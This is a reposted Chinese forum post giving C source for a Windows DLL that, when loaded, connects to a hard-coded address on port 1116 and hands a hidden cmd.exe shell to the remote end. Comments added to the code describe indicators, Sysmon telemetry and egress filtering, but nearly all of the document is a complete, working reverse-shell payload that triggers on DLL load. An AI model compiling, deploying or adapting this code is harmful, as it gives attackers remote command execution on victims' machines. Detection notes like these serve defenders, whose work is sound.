
dll 反弹代码

2017年04月19日 13:15 汪洋大海 暂无评论 阅读 18 views 次

作者:lostwolf
地址:https://www.t00ls.net/thread-39410-1-1.html


// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"
#include
#include

// Link against the Winsock 2 import library (MSVC-specific pragma).
#pragma comment(lib,"ws2_32")
// Forward declaration: the routine DllMain runs on process attach.
void reverse_shell();
// File-scope state used by reverse_shell(). Everything is global and
// zero-initialised by the loader; nothing here is released by the code
// visible on this page.
WSADATA wsaData;   // filled in by WSAStartup
SOCKET Winsock;    // the outbound TCP socket
SOCKET Sock;       // declared but not referenced in the code shown
struct sockaddr_in hax;   // remote endpoint (address family, port, IPv4 address)

// Startup parameters and result handles for the child process that
// reverse_shell() creates.
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;

// DLL entry point, invoked by the Windows loader.
//
// hDll and lpReserved are not used. Only DLL_PROCESS_ATTACH has an
// effect: it calls reverse_shell() directly. The other three reasons are
// empty, and the function always returns TRUE.
//
// Analyst note: because the behaviour is wired to process attach, simply
// mapping this DLL into a process triggers it; no exported function has
// to be called. The earliest host-side detection point is therefore the
// image load itself (for example Sysmon Event ID 7 for an unsigned or
// unexpected module), before any network or process activity appears.
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{

switch (dwReason)
{
case DLL_PROCESS_ATTACH:
// Runs synchronously inside the loader callback.
reverse_shell();
break;

case DLL_PROCESS_DETACH:

break;

case DLL_THREAD_ATTACH:

break;

case DLL_THREAD_DETACH:

break;
}
return TRUE;
}

// Connects a TCP socket to a hard-coded endpoint and starts cmd.exe with
// its standard input, output and error all redirected to that socket.
// Takes no parameters and returns nothing; no API return value is checked.
//
// Indicators visible in this sample (values taken from the code below):
//   - named event object "sysnullevt"
//   - outbound TCP connection to 172.31.139.141, port 1116
//     (an RFC 1918 private address, so presumably a lab or internal host)
//   - cmd.exe created with CREATE_NO_WINDOW and inherited handles
//
// Detection and mitigation notes: the combination of a windowless cmd.exe
// whose parent is the process that loaded this DLL, plus an outbound TCP
// connection from that parent, is what process-creation and
// network-connection telemetry (e.g. Sysmon Event IDs 1 and 3) should be
// correlated on. Egress filtering that blocks arbitrary outbound TCP from
// hosts that do not need it removes the channel this code depends on.
void reverse_shell()
{
// Create (or open) a named, manual-reset, initially non-signalled event.
// The object name is a stable host-side indicator for this sample.
LPCSTR szMyUniqueNamedEvent = "sysnullevt";
HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent);

switch (GetLastError())
{
// app is already running
// NOTE(review): this branch only closes the handle; `break` leaves the
// switch, not the function, so the code below runs whether or not the
// event already existed. A pre-existing "sysnullevt" object therefore
// does not stop the behaviour.
case ERROR_ALREADY_EXISTS:
{
CloseHandle(m_hEvent);
break;
}

// First instance: nothing is done and m_hEvent is not closed here.
case ERROR_SUCCESS:
{

break;
}
}

// Initialise Winsock 2.2 and create a TCP/IPv4 socket (group and flags
// arguments are both zero).
WSAStartup(MAKEWORD(2, 2), &wsaData);
Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

// Hard-coded remote endpoint: port 1116, converted to network byte order.
hax.sin_family = AF_INET;
hax.sin_port = htons(atoi("1116"));

// Hard-coded IPv4 address; the connect result is ignored.
hax.sin_addr.s_addr = inet_addr("172.31.139.141");
WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

// Zero the startup structure, then point all three standard handles of
// the child at the socket.
memset(&ini_processo, 0, sizeof(ini_processo));
ini_processo.cb = sizeof(ini_processo);
ini_processo.dwFlags = STARTF_USESTDHANDLES;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

// Start cmd.exe with handle inheritance enabled (TRUE) and no console
// window. The handles returned in processo_info are never closed.
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, (LPSTARTUPINFOA)&ini_processo, &processo_info);

}
